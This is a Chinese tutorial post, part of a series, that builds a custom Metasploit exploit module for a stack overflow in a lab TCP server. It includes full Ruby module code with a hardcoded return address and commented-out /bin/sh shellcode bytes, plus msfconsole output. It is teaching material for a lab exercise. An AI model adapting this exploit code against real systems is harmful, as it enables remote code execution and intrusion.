有了漏洞我们就可以进行攻击了。首先我们需要了解metasploit的exploit模块,具体可以看

http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

metasploit本身功能非常强大,这里不多做介绍。

首先我们需要添加一个针对这个漏洞的exploit模块,

我们直接在样例上进行修改:

root@bt:~/.msf4/modules# mkdir exploits

root@bt:~/.msf4/modules# cd exploits

root@bt:~/.msf4/modules/exploits# mkdir linux

root@bt:~/.msf4/modules/exploits/linux# cp /pentest/exploits/framework/documentation/samples/modules/exploits/sample.rb  myvictim.rb

root@bt:~/.msf4/modules/exploits/linux# ls

myvictim.rb  myvictimserver.rb  proftp_sreplace.rb

然后查看myvictim.rb

##

# $Id: sample.rb 9212 2010-05-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

module Msf

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Exploits::Sample < Msf::Exploit::Remote

        #

        # This exploit affects TCP servers, so we use the TCP client mixin.

        #

        include Exploit::Remote::Tcp

        def initialize(info = {})

                super(update_info(info,

                        'Name'           => 'Sample exploit',

                        'Description'    => %q{

                                        This exploit module illustrates how a vu

lnerability could be exploited

                                in an TCP server that has a parsing bug.

                        },

                        'Author'         => 'skape',

                        'Version'        => '$Revision: 9212 $',

                        'References'     =>

                                [

                                ],

                        'Payload'        =>

                                {

                                        'Space'    => 1000,

                                        'BadChars' => "\x00",

                                },

                        'Targets'        =>

                                [

                                        # Target 0: Windows All

                                        [

                                                'Windows Universal',

                                                {

                                                        'Platform' => 'win',

                                                        'Ret'      => 0x41424344

                                                }

                                        ],

                                ],

                        'DefaultTarget' => 0))

        end

        #

        # The sample exploit just indicates that the remote host is always

        # vulnerable.

        #

        def check

                return Exploit::CheckCode::Vulnerable

        end

        #

        # The exploit method connects to the remote service and sends 1024 A's

        # followed by the fake return address and then the payload.

        #

        def exploit

                connect

                print_status("Sending #{payload.encoded.length} byte payload..."

)

                # Build the buffer for transmission

                buf  = "A" * 1024

                buf += [ target.ret ].pack('V')

                buf += payload.encoded

                # Send it off

                sock.put(buf)

                sock.get

                handler

        end

end

end

然后我们需要把他添加进metasploit,运行reload_all

=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 719 exploits - 361 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 1208 days ago (2011.08.01)

Warning: This copy of the Metasploit Framework was last updated 1208 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306

msf > reload_all

msf > use exploit/linux/my
use exploit/linux/mysql/mysql_yassl_getname use exploit/linux/myvictimserver
use exploit/linux/mysql/mysql_yassl_hello
msf > use exploit/linux/my

这里并没有列出来我们刚刚添加的模块,说明模块有问题,必须修改,修改如下:

##

# $Id: myvictimserver.rb 9212 2014-11-03 17:13:09Z jduck $

##

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

##

require 'msf/core'

###

#

# This exploit sample shows how an exploit module could be written to exploit

# a bug in an arbitrary TCP server.

#

###

class Metasploit3 < Msf::Exploit::Remote

    Rank = GreatRanking

    #

    # This exploit affects TCP servers, so we use the TCP client mixin.

    #

    include Exploit::Remote::Tcp

    def initialize(info = {})

        super(update_info(info,

            'Name'           => 'MyVictimSever',

            'Description'    => %q{

                    This exploit module illustrates how a vulnerability could be exploited

                in an TCP server that has a stackoverflow bug.

            },

            'Author'         => 'bai',

            'Version'        => '$Revision: 9212 $',

            'References'     =>

                [

                ],

            'Payload'        =>

                {

                    'Space'    => 116, #

                    'BadChars' => "\x00",

                },

            'Targets'        =>

                [

                    # Target 0: Windows All

                    [

                        'MyVictimSever run on linux',

                        {

                            'Platform' => 'Linux',

                            'Ret'      =>  0xbffff4a4

                        }

                    ],

                ],

            'DefaultTarget' => 0))

    end

    #

    # The sample exploit just indicates that the remote host is always

    # vulnerable.

    #

    def check

        return Exploit::CheckCode::Vulnerable

    end

    #

    # The exploit method connects to the remote service and sends 1024 A's

    # followed by the fake return address and then the payload.

    #

    def exploit

        connect

        print_status("Sending #{payload.encoded.length} byte payload...")

        # Build the buffer for transmission

        buf="";

        #buf  = "\x90" * 15

        #buf+="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

        #buf+="\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

        #buf+="\x80\xe8\xdc\xff\xff\xff/bin/sh";

        buf+="\xa4\xf4\xff\xbf"

        buf += payload.encoded

        buf += [].fill( target.ret,0,100).pack('V*')

        # Send it off

        sock.put(buf)

        sock.get

        handler

    end

end

这时候,我们就可以找到这个模块了。

msf > use exploit/linux/my

use exploit/linux/mysql/mysql_yassl_getname  use exploit/linux/myvictim

use exploit/linux/mysql/mysql_yassl_hello    use exploit/linux/myvictimserver

msf > use exploit/linux/my

使用metasploit进行栈溢出攻击-4的更多相关文章

  1. 使用metasploit进行栈溢出攻击-1

    攻击是在bt5下面进行,目标程序是在ubuntu虚拟机上运行. 首先,需要搞明白什么是栈溢出攻击,详细内容请阅读 http://blog.csdn.net/cnctloveyu/article/det ...

  2. 使用metasploit进行栈溢出攻击-2

    基本的栈溢出搞明白了,真实攻击中一个很重要的问题是shellcode生成. 利用Metasploit提供的工具,可以方便的生成shellcode,然后可以使用第一篇中的代码进行验证. 先说一下如何生成 ...

  3. 使用metasploit进行栈溢出攻击-3

    有了shellcode,就可以进行攻击了,但是要有漏洞才行,真实世界中的漏洞很复杂,并且很难发现,因此我专门做一个漏洞来进行攻击. 具体来说就是做一个简单的tcp server,里面包含明显的栈溢出漏 ...

  4. 使用metasploit进行栈溢出攻击-5

    我们先尝试使用这个脚本进行攻击: msf > use exploit/linux/myvictim msf exploit(myvictim) > set payload linux/x8 ...

  5. [转]现代Linux系统上的栈溢出攻击

    1. 基本内容 这个教程试着向读者展示最基本的栈溢出攻击和现代Linux发行版中针对这种攻击的防御机制.为此我选择了最新版本的Ubuntu系统(12.10),因为它默认集成了几个安全防御机制,而且它也 ...

  6. Linux下基本栈溢出攻击【转】

    转自:http://blog.csdn.net/wangxiaolong_china/article/details/6844415 版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[ ...

  7. [翻译]现代Linux系统上的栈溢出攻击【转】

    转自:http://www.codeweblog.com/%E7%BF%BB%E8%AF%91-%E7%8E%B0%E4%BB%A3linux%E7%B3%BB%E7%BB%9F%E4%B8%8A%E ...

  8. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  9. 实验三 kali下metasploit的漏洞攻击实践

    一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用 ...

随机推荐

  1. BZOJ1901:Dynamic Rankings

    浅谈离线分治算法:https://www.cnblogs.com/AKMer/p/10415556.html 题目传送门:https://lydsy.com/JudgeOnline/problem.p ...

  2. 利用TaskScheduler处理Queue、Stack等类型的操作队列(生产者消费者场景)

    我们经常会遇到生产者消费者模式,比如前端各种UI操作事件触发后台逻辑等.在这种典型的应用场景中,我们可能会有4个业务处理逻辑(下文以P代表生产者,C代表消费者): 1. FIFO(先进先出)     ...

  3. Chroma Oracle 安装宝典,吐血整理

    尼玛,太坑爹!安装: 1.Chroma Application Service 2. PL SQL 安装Oracle 11g 的步骤和过程: 第一步:只能安装 Oracle 11g 64 bit 数据 ...

  4. 配置进程外Session

    配置进程外Session: (1)将服务器Session信息存储在进程外           <1> 首先,开启asp.net state 服务: 控制面板 -> 程序和功能 -&g ...

  5. 蓝桥杯 算法训练 ALGO-125 王、后传说

    算法训练 王.后传说   时间限制:1.0s   内存限制:256.0MB 问题描述 地球人都知道,在国际象棋中,后如同太阳,光芒四射,威风八面,它能控制横.坚.斜线位置. 看过清宫戏的中国人都知道, ...

  6. (转)AppCan中调用系统浏览器打开网页

    <!DOCTYPE html> <html> <head> <style>body{ background:#fff; font-size:30px;} ...

  7. NHibernate使用总结(2)

    首先,映射文件的名称一定要是XXX.hbm.xml且生成方式一定要是嵌入的资源+不复制. hibernate.cfg.xml这个文件要放在根目录下,且生成方式必须是内容+始终复制. private v ...

  8. 有关UCOS_II在LPC1768上的应用

    https://www.cnblogs.com/chungshu/archive/2012/12/14/2818380.html

  9. java代码流类

    总结:读取到的是字节型转换成字符串. package com.c2; import java.io.*; public class tkrp { public static void main(Str ...

  10. Rails的静态资源管理(四)—— 生产环境的 Asset Pipeline

    官方文档:http://guides.ruby-china.org/asset_pipeline.html http://guides.rubyonrails.org/asset_pipeline.h ...